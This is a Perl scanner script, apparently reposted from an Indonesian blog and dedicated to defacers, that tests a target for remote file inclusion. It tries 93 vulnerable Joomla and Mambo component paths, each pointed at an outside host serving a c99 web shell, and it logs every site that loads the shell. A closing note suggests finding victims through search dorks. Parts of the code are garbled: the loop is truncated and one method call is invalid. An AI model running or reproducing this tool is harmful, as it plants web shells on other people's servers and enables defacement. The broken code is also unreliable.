#!/usr/bin/perl
#Scan web RFI
# by Sicklast, Joomla and mamboo Version
use HTTP::Request;
use LWP::UserAgent;
&inizio;
sub inizio{
print q(
###########################
Rfi Host scanner
by sicklast, joomla and mamboo version
dedicated for:Hacker-newbie , devilzc0de ,and all indonesia defacer
###########################
);
print "\n Insert host:(ex: http://www.site.gov.my/)\n";
$host=<stdin>;</stdin>
chomp($host);
print "Mulai scan....\n";
$rfi1="components/com_flyspray/startdown.php?file=";
$rfi2="administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=";
$rfi3="components/com_simpleboard/file_upload.php?sbp=";
$rfi4="components/com_hashcash/server.php?mosConfig_absolute_path=";
$rfi5="components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=";
$rfi6="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
$rfi7="components/com_performs/performs.php?mosConfig_absolute_path=";
$rfi8="components/com_forum/download.php?phpbb_root_path=";
$rfi9="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
$rfi10="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
$rfi11="components/minibb/index.php?absolute_path=";
$rfi12="components/com_smf/smf.php?mosConfig_absolute_path=";
$rfi13="modules/mod_calendar.php?absolute_path=";
$rfi14="components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=";
$rfi15="components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=";
$rfi16="components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=";
$rfi17="components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=";
$rfi18="administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=";
$rfi19="administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=";
$rfi20="components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=";
$rfi21="components/com_securityimages/configinsert.php?mosConfig_absolute_path=";
$rfi22="components/com_securityimages/lang.php?mosConfig_absolute_path=";
$rfi23="components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=";
$rfi24="components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
$rfi25="akocomments.php?mosConfig_absolute_path=";
$rfi26="administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=";
$rfi27="cropcanvas.php?cropimagedir=";
$rfi28="administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=";
$rfi29="administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=";
$rfi30="components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=";
$rfi31="components/com_zoom/includes/database.php?mosConfig_absolute_path=";
$rfi32="administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=";
$rfi33="components/com_fm/fm.install.php?lm_absolute_path=";
$rfi34="administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=";
$rfi35="components/com_lmo/lmo.php?mosConfig_absolute_path=";
$rfi36="administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=";
$rfi37="components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
$rfi38="administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=";
$rfi39="administrator/components/com_webring/admin.webring.docs.php?component_dir=";
$rfi40="administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
$rfi41="administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=";
$rfi42="administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=";
$rfi43="components/com_mambowiki/Mam***ogin.php?IP=";
$rfi44="administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=";
$rfi45="administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
$rfi46="components/com_cpg/cpg.php?mosConfig_absolute_path=";
$rfi47="components/com_moodle/moodle.php?mosConfig_absolute_path=";
$rfi48="components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=";
$rfi49="components/com_mospray/scripts/admin.php?basedir=";
$rfi50="administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=";
$rfi51="administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=";
$rfi52="administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=";
$rfi53="administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=";
$rfi54="components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=";
$rfi55="components/com_madeira/img.php?url=";
$rfi56="components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=";
$rfi57="components/com_bsq_sitestats/external/rssfeed.php?baseDir=";
$rfi58="com_bsq_sitestats/external/rssfeed.php?baseDir=";
$rfi59="components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=";
$rfi60="administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=";
$rfi61="components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=";
$rfi62="administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=";
$rfi63="components/com_joomlaboard/file_upload.php?sbp=";
$rfi64="components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=";
$rfi65="components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=";
$rfi66="components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=";
$rfi67="components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=";
$rfi68="components/com_thopper/inc/request_type.php?mosConfig_absolute_path=";
$rfi69="components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=";
$rfi70="components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=";
$rfi71="components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=";
$rfi72="components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=";
$rfi73="components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=";
$rfi74="modules/mod_weather.php?absolute_path=";
$rfi75="components/calendar/com_calendar.php?absolute_path=";
$rfi76="modules/calendar/mod_calendar.php?absolute_path=";
$rfi77="components/com_calendar.php?absolute_path=";
$rfi78="modules/mod_calendar.php?absolute_path=";
$rfi79="components/com_mosmedia/media.tab.php?mosConfig_absolute_path=";
$rfi80="components/com_mosmedia/media.divs.php?mosConfig_absolute_path=";
$rfi81="administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=";
$rfi82="administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=";
$rfi83="administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=";
$rfi84="components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=";
$rfi85="administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=";
$rfi86="administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=";
$rfi87="administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=";
$rfi88="administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=";
$rfi89="administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=";
$rfi90="administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=";
$rfi91="administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=";
$rfi92="administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=";
$rfi93="administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=";
$int = $values[ rand(4) ];
for($int=1;$int
@cmdgif="http://cubesix.co.uk/madhouse/c99.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->W00t) {
if( $response->content =~ /c99shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnerable..\n";
}}
}
}
========>
kalo os windows harus download active perl dulu trus dijalanin....[ http;//strawberryperl.com]
kalo mo nyari targetnya bisa pake dork joomla atau acunetix
Tidak ada komentar:
Posting Komentar